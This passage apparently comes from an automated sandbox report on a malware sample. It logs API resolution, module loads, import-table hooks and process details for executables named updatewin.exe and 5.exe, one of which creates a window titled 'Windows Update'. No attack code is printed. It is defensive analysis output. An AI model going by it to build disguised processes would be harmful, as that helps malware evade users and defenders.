Load api-ms-win-core-fibers-l1-1-1 base_address = 0x0 False 2
Fn
Load api-ms-win-core-localization-l1-2-1 base_address = 0x0 False 1
Fn
Get Handle c:\windows\syswow64\kernel32.dll base_address = 0x76c20000 True 11
Fn
Get Filename - process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\local\b5a25ed0-1316-46f7-8916-da3c9e0e5de0\updatewin1.exe, file_name_orig = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\b5a25ed0-1316-46f7-8916-da3c9e0e5de0\updatewin1.exe, size = 260 True 1
Fn
Get Filename api-ms-win-core-localization-l1-2-1 process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\local\b5a25ed0-1316-46f7-8916-da3c9e0e5de0\updatewin1.exe, file_name_orig = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\b5a25ed0-1316-46f7-8916-da3c9e0e5de0\updatewin1.exe, size = 260 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FlsAlloc, address_out = 0x76c34f2b True 3
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FlsGetValue, address_out = 0x76c31252 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FlsSetValue, address_out = 0x76c34208 True 3
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FlsFree, address_out = 0x76c3359f True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = EncodePointer, address_out = 0x77170fcb True 9
Fn
Get Address c:\windows\syswow64\kernel32.dll function = DecodePointer, address_out = 0x77169d35 True 4
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateToolhelp32Snapshot, address_out = 0x76c5735f True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = Module32FirstW, address_out = 0x76c579f9 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = VirtualAlloc, address_out = 0x76c31856 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = VirtualProtect, address_out = 0x76c3435f True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = VirtualFree, address_out = 0x76c3186e True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetVersionExA, address_out = 0x76c33519 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = TerminateProcess, address_out = 0x76c4d802 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = ExitProcess, address_out = 0x76c37a10 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetErrorMode, address_out = 0x76c31b00 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateFileA, address_out = 0x76c353c6 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = WriteFile, address_out = 0x76c31282 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FlushFileBuffers, address_out = 0x76c3469b True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CloseHandle, address_out = 0x76c31410 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateProcessA, address_out = 0x76c31072 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = lstrcpyW, address_out = 0x76c53102 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateProcessW, address_out = 0x76c3103d True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = WaitForSingleObject, address_out = 0x76c31136 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateFileW, address_out = 0x76c33f5c True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = lstrlenA, address_out = 0x76c35a4b True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = WideCharToMultiByte, address_out = 0x76c3170d True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = MultiByteToWideChar, address_out = 0x76c3192e True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCommandLineW, address_out = 0x76c35223 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = WriteConsoleW, address_out = 0x76c57aca True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetFilePointerEx, address_out = 0x76c4c807 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetConsoleMode, address_out = 0x76c31328 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = DeleteFileA, address_out = 0x76c35444 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = HeapReAlloc, address_out = 0x77171f6e True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = HeapSize, address_out = 0x77163002 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetProcessHeap, address_out = 0x76c314e9 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = LCMapStringW, address_out = 0x76c317b9 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetStringTypeW, address_out = 0x76c31946 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetFileType, address_out = 0x76c33531 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetStdHandle, address_out = 0x76cb454f True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = lstrcatA, address_out = 0x76c52b7a True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = lstrcpyA, address_out = 0x76c52a9d True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetEnvironmentVariableA, address_out = 0x76c333a0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetShortPathNameA, address_out = 0x76c5594d True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetModuleFileNameA, address_out = 0x76c314b1 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetConsoleCP, address_out = 0x76cd7bff True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetLastError, address_out = 0x76c311a9 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FreeEnvironmentStringsW, address_out = 0x76c351cb True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetEnvironmentStringsW, address_out = 0x76c351e3 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCommandLineA, address_out = 0x76c351a1 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCPInfo, address_out = 0x76c35189 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetOEMCP, address_out = 0x76c5d1a1 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = IsValidCodePage, address_out = 0x76c34493 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = UnhandledExceptionFilter, address_out = 0x76c5772f True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetUnhandledExceptionFilter, address_out = 0x76c387c9 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCurrentProcess, address_out = 0x76c31809 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = IsProcessorFeaturePresent, address_out = 0x76c35235 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = QueryPerformanceCounter, address_out = 0x76c31725 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCurrentProcessId, address_out = 0x76c311f8 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCurrentThreadId, address_out = 0x76c31450 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetSystemTimeAsFileTime, address_out = 0x76c33509 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = InitializeSListHead, address_out = 0x771694a4 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = IsDebuggerPresent, address_out = 0x76c34a5d True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetStartupInfoW, address_out = 0x76c34d40 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetModuleHandleW, address_out = 0x76c334b0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = RtlUnwind, address_out = 0x76c5d1c3 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = RaiseException, address_out = 0x76c358a6 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetLastError, address_out = 0x76c311c0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = EnterCriticalSection, address_out = 0x771522b0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = LeaveCriticalSection, address_out = 0x77152270 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = DeleteCriticalSection, address_out = 0x771645f5 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = InitializeCriticalSectionAndSpinCount, address_out = 0x76c31916 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = TlsAlloc, address_out = 0x76c349ad True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = TlsGetValue, address_out = 0x76c311e0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = TlsSetValue, address_out = 0x76c314fb True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = TlsFree, address_out = 0x76c33587 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FreeLibrary, address_out = 0x76c334c8 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetProcAddress, address_out = 0x76c31222 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = LoadLibraryExW, address_out = 0x76c3495d True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetStdHandle, address_out = 0x76c351b3 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetModuleFileNameW, address_out = 0x76c34950 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetModuleHandleExW, address_out = 0x76c34a6f True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetACP, address_out = 0x76c3179c True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = HeapAlloc, address_out = 0x7715e026 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = HeapFree, address_out = 0x76c314c9 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FindClose, address_out = 0x76c34442 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FindFirstFileExW, address_out = 0x76c41811 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FindNextFileW, address_out = 0x76c354ee True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = RegOpenKeyExW, address_out = 0x74d5468d True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = RegCloseKey, address_out = 0x74d5469d True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = RegCreateKeyExW, address_out = 0x74d540fe True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = SetSecurityDescriptorDacl, address_out = 0x74d5415e True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = InitializeSecurityDescriptor, address_out = 0x74d54620 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = RegSetValueExW, address_out = 0x74d514d6 True 1
Fn
Get Address c:\windows\syswow64\shell32.dll function = ShellExecuteExW, address_out = 0x75ff1e46 True 1
Fn
Get Address c:\windows\syswow64\shell32.dll function = SHGetFolderPathW, address_out = 0x76055708 True 1
Fn
Get Address c:\windows\syswow64\shell32.dll function = CommandLineToArgvW, address_out = 0x75fe9ee8 True 1
Fn
Get Address c:\windows\syswow64\shlwapi.dll function = PathAppendW, address_out = 0x753581ef True 1
Fn
Get Address c:\windows\syswow64\shlwapi.dll function = PathFileExistsA, address_out = 0x7537ad1a True 1
Fn
Get Address c:\windows\syswow64\shlwapi.dll function = PathRemoveFileSpecW, address_out = 0x75353248 True 1
Fn
Get Address c:\windows\syswow64\msvcr100.dll function = atexit, address_out = 0x749dc544 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = InitializeCriticalSectionEx, address_out = 0x76c34d28 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = LCMapStringEx, address_out = 0x76cb47f1 True 1
Fn
System (256)
»
Operation Additional Information Success Count Logfile
Get Time type = System Time, time = 2019-05-13 17:22:59 (UTC) True 1
Fn
Get Time type = Ticks, time = 158777 True 1
Fn
Get Time type = Performance Ctr, time = 22030380328 True 1
Fn
Get Time type = Ticks, time = 159074 True 1
Fn
Get Time type = System Time True 249
Fn
Get Time type = System Time, time = 2019-05-13 17:23:00 (UTC) True 1
Fn
Get Time type = Performance Ctr, time = 22195645221 True 1
Fn
Get Info type = Operating System True 1
Fn
Environment (2)
»
Operation Additional Information Success Count Logfile
Get Environment String - True 2
Fn
Data
Process #9: updatewin.exe
709 0
»
Information Value
ID #9
File Name c:\users\5p5nrgjn0js halpmcxz\appdata\local\b5a25ed0-1316-46f7-8916-da3c9e0e5de0\updatewin.exe
Command Line "C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\b5a25ed0-1316-46f7-8916-da3c9e0e5de0\updatewin.exe"
Initial Working Directory C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\
Monitor Start Time: 00:01:40, Reason: Child Process
Unmonitor End Time: 00:04:44, Reason: Terminated by Timeout
Monitor Duration 00:03:04
OS Process Information
»
Information Value
PID 0x4a4
Parent PID 0x2c8 (c:\users\5p5nrgjn0js halpmcxz\desktop\eb54.tmp.exe)
Bitness 32-bit
Is Created or Modified Executable True
Integrity Level High (Elevated)
Username XDUWTFONO\5p5NrGJn0jS HALPmcxz
Enabled Privileges SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs
0x 508
0x 854
Memory Dumps
»
Name Start VA End VA Dump Reason PE Rebuilds Bitness Entry Points AV YARA Actions
updatewin.exe 0x00400000 0x0044DFFF Relevant Image - 32-bit - False False
...
buffer 0x00555000 0x00555FFF Marked Executable - 32-bit - False False
...
Hook Information
»
Type Installer Target Size Information Actions
IAT private_0x0000000000540000:+0x16785 90. entry of updatewin.exe 4 bytes kernel32.dll:QueryPerformanceCounter+0x0 now points to pagefile_0x0000000000960000:+0x6a0000
...
IAT private_0x0000000000540000:+0x16785 121. entry of updatewin.exe 4 bytes user32.dll:CallMsgFilterW+0x0 now points to pagefile_0x0000000000960000:+0x6a0000
...
Host Behavior
File (6)
»
Operation Filename Additional Information Success Count Logfile
Open STD_INPUT_HANDLE - True 2
Fn
Open STD_OUTPUT_HANDLE - True 2
Fn
Open STD_ERROR_HANDLE - True 2
Fn
Module (169)
»
Operation Module Additional Information Success Count Logfile
Load kernel32.dll base_address = 0x76c20000 True 2
Fn
Load KERNEL32.dll base_address = 0x76c20000 True 1
Fn
Load USER32.dll base_address = 0x74f40000 True 1
Fn
Load GDI32.dll base_address = 0x75ad0000 True 1
Fn
Load COMCTL32.dll base_address = 0x74820000 True 1
Fn
Load WINMM.dll base_address = 0x74af0000 True 1
Fn
Load msvcr100.dll base_address = 0x749c0000 True 1
Fn
Load api-ms-win-core-synch-l1-2-0 base_address = 0x0 False 2
Fn
Load kernel32 base_address = 0x0 False 2
Fn
Load kernel32 base_address = 0x76c20000 True 2
Fn
Load api-ms-win-core-fibers-l1-1-1 base_address = 0x0 False 2
Fn
Load api-ms-win-core-localization-l1-2-1 base_address = 0x0 False 1
Fn
Get Handle c:\windows\syswow64\kernel32.dll base_address = 0x76c20000 True 11
Fn
Get Filename - process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\local\b5a25ed0-1316-46f7-8916-da3c9e0e5de0\updatewin.exe, file_name_orig = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\b5a25ed0-1316-46f7-8916-da3c9e0e5de0\updatewin.exe, size = 260 True 1
Fn
Get Filename api-ms-win-core-localization-l1-2-1 process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\local\b5a25ed0-1316-46f7-8916-da3c9e0e5de0\updatewin.exe, file_name_orig = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\b5a25ed0-1316-46f7-8916-da3c9e0e5de0\updatewin.exe, size = 260 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FlsAlloc, address_out = 0x76c34f2b True 3
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FlsGetValue, address_out = 0x76c31252 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FlsSetValue, address_out = 0x76c34208 True 3
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FlsFree, address_out = 0x76c3359f True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = EncodePointer, address_out = 0x77170fcb True 8
Fn
Get Address c:\windows\syswow64\kernel32.dll function = DecodePointer, address_out = 0x77169d35 True 4
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateToolhelp32Snapshot, address_out = 0x76c5735f True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = Module32FirstW, address_out = 0x76c579f9 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = VirtualAlloc, address_out = 0x76c31856 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = VirtualProtect, address_out = 0x76c3435f True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = VirtualFree, address_out = 0x76c3186e True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetVersionExA, address_out = 0x76c33519 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = TerminateProcess, address_out = 0x76c4d802 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = ExitProcess, address_out = 0x76c37a10 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetErrorMode, address_out = 0x76c31b00 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FlushFileBuffers, address_out = 0x76c3469b True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = HeapReAlloc, address_out = 0x77171f6e True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = HeapSize, address_out = 0x77163002 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetProcessHeap, address_out = 0x76c314e9 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = LCMapStringW, address_out = 0x76c317b9 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetConsoleCP, address_out = 0x76cd7bff True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetStringTypeW, address_out = 0x76c31946 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetFileType, address_out = 0x76c33531 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetStdHandle, address_out = 0x76cb454f True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FreeEnvironmentStringsW, address_out = 0x76c351cb True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetEnvironmentStringsW, address_out = 0x76c351e3 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCommandLineW, address_out = 0x76c35223 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCommandLineA, address_out = 0x76c351a1 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCPInfo, address_out = 0x76c35189 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetOEMCP, address_out = 0x76c5d1a1 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = IsValidCodePage, address_out = 0x76c34493 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetConsoleMode, address_out = 0x76c31328 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetFilePointerEx, address_out = 0x76c4c807 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateFileW, address_out = 0x76c33f5c True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CloseHandle, address_out = 0x76c31410 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = WriteConsoleW, address_out = 0x76c57aca True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = Sleep, address_out = 0x76c310ff True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = lstrlenW, address_out = 0x76c31700 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetLastError, address_out = 0x76c311c0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateThread, address_out = 0x76c334d5 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FindNextFileW, address_out = 0x76c354ee True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = UnhandledExceptionFilter, address_out = 0x76c5772f True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetUnhandledExceptionFilter, address_out = 0x76c387c9 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCurrentProcess, address_out = 0x76c31809 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = IsProcessorFeaturePresent, address_out = 0x76c35235 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = QueryPerformanceCounter, address_out = 0x76c31725 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCurrentProcessId, address_out = 0x76c311f8 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCurrentThreadId, address_out = 0x76c31450 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetSystemTimeAsFileTime, address_out = 0x76c33509 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = InitializeSListHead, address_out = 0x771694a4 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = IsDebuggerPresent, address_out = 0x76c34a5d True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetStartupInfoW, address_out = 0x76c34d40 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetModuleHandleW, address_out = 0x76c334b0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = RtlUnwind, address_out = 0x76c5d1c3 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetLastError, address_out = 0x76c311a9 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = EnterCriticalSection, address_out = 0x771522b0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = LeaveCriticalSection, address_out = 0x77152270 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = DeleteCriticalSection, address_out = 0x771645f5 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = InitializeCriticalSectionAndSpinCount, address_out = 0x76c31916 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = TlsAlloc, address_out = 0x76c349ad True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = TlsGetValue, address_out = 0x76c311e0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = TlsSetValue, address_out = 0x76c314fb True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = TlsFree, address_out = 0x76c33587 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FreeLibrary, address_out = 0x76c334c8 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetProcAddress, address_out = 0x76c31222 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = LoadLibraryExW, address_out = 0x76c3495d True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = RaiseException, address_out = 0x76c358a6 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetStdHandle, address_out = 0x76c351b3 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = WriteFile, address_out = 0x76c31282 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetModuleFileNameW, address_out = 0x76c34950 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = MultiByteToWideChar, address_out = 0x76c3192e True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = WideCharToMultiByte, address_out = 0x76c3170d True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetModuleHandleExW, address_out = 0x76c34a6f True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetACP, address_out = 0x76c3179c True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = HeapAlloc, address_out = 0x7715e026 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = HeapFree, address_out = 0x76c314c9 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FindClose, address_out = 0x76c34442 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FindFirstFileExW, address_out = 0x76c41811 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = GetDesktopWindow, address_out = 0x74f60a19 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = InvalidateRect, address_out = 0x74f61381 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = wsprintfW, address_out = 0x74f7e061 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = DrawIcon, address_out = 0x74f68deb True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = FillRect, address_out = 0x74f60eb6 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = SendMessageW, address_out = 0x74f59679 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = GetDlgItem, address_out = 0x74f7f1ba True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = PostQuitMessage, address_out = 0x74f59abb True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = EndPaint, address_out = 0x74f61341 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = BeginPaint, address_out = 0x74f61361 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = DefWindowProcW, address_out = 0x771625dd True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = DestroyWindow, address_out = 0x74f59a55 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = DialogBoxParamW, address_out = 0x74f7cfca True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = MoveWindow, address_out = 0x74f63698 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = GetClientRect, address_out = 0x74f60c62 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = CreateDialogParamW, address_out = 0x74f810dc True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = UpdateWindow, address_out = 0x74f63559 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = ShowWindow, address_out = 0x74f60dfb True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = SetWindowPos, address_out = 0x74f58e4e True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = CreateWindowExW, address_out = 0x74f58a29 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = RegisterClassExW, address_out = 0x74f5b17d True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = LoadCursorW, address_out = 0x74f588f7 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = DispatchMessageW, address_out = 0x74f5787b True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = TranslateMessage, address_out = 0x74f57809 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = TranslateAcceleratorW, address_out = 0x74f61246 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = GetMessageW, address_out = 0x74f578e2 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = LoadAcceleratorsW, address_out = 0x74f64dd6 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = LoadStringW, address_out = 0x74f58eb9 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = LoadIconW, address_out = 0x74f5b142 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = GetMonitorInfoW, address_out = 0x74f63000 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = MonitorFromWindow, address_out = 0x74f63150 True 1
Fn
Get Address c:\windows\syswow64\gdi32.dll function = TextOutW, address_out = 0x75aed41c True 1
Fn
Get Address c:\windows\syswow64\gdi32.dll function = SetBkMode, address_out = 0x75ae51a2 True 1
Fn
Get Address c:\windows\syswow64\gdi32.dll function = SelectObject, address_out = 0x75ae4f70 True 1
Fn
Get Address c:\windows\syswow64\gdi32.dll function = CreateFontW, address_out = 0x75aeb600 True 1
Fn
Get Address c:\windows\syswow64\gdi32.dll function = DeleteObject, address_out = 0x75ae5689 True 1
Fn
Get Address c:\windows\syswow64\gdi32.dll function = CreateSolidBrush, address_out = 0x75ae4f17 True 1
Fn
Get Address c:\windows\syswow64\gdi32.dll function = SetTextAlign, address_out = 0x75ae8401 True 1
Fn
Get Address c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll function = InitCommonControlsEx, address_out = 0x748409ce True 1
Fn
Get Address c:\windows\syswow64\winmm.dll function = timeGetTime, address_out = 0x74af26e0 True 1
Fn
Get Address c:\windows\syswow64\msvcr100.dll function = atexit, address_out = 0x749dc544 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = InitializeCriticalSectionEx, address_out = 0x76c34d28 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = LCMapStringEx, address_out = 0x76cb47f1 True 1
Fn
Window (1)
»
Operation Window Name Additional Information Success Count Logfile
Create Windows Update class_name = WINDOWSUPDATE, wndproc_parameter = 0 True 1
Fn
System (266)
»
Operation Additional Information Success Count Logfile
Sleep duration = 1000 milliseconds (1.000 seconds) True 10
Fn
Get Time type = System Time, time = 2019-05-13 17:22:59 (UTC) True 1
Fn
Get Time type = Ticks, time = 159479 True 1
Fn
Get Time type = Performance Ctr, time = 22089751189 True 1
Fn
Get Time type = Ticks, time = 159838 True 1
Fn
Get Time type = System Time True 249
Fn
Get Time type = System Time, time = 2019-05-13 17:23:01 (UTC) True 1
Fn
Get Time type = Performance Ctr, time = 22257650376 True 1
Fn
Get Info type = Operating System True 1
Fn
Environment (2)
»
Operation Additional Information Success Count Logfile
Get Environment String - True 2
Fn
Data
Process #10: 5.exe
690 2
»
Information Value
ID #10
File Name c:\users\5p5nrgjn0js halpmcxz\appdata\local\b5a25ed0-1316-46f7-8916-da3c9e0e5de0\5.exe
Command Line "C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\b5a25ed0-1316-46f7-8916-da3c9e0e5de0\5.exe"
Initial Working Directory C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\
Monitor Start Time: 00:01:41, Reason: Child Process
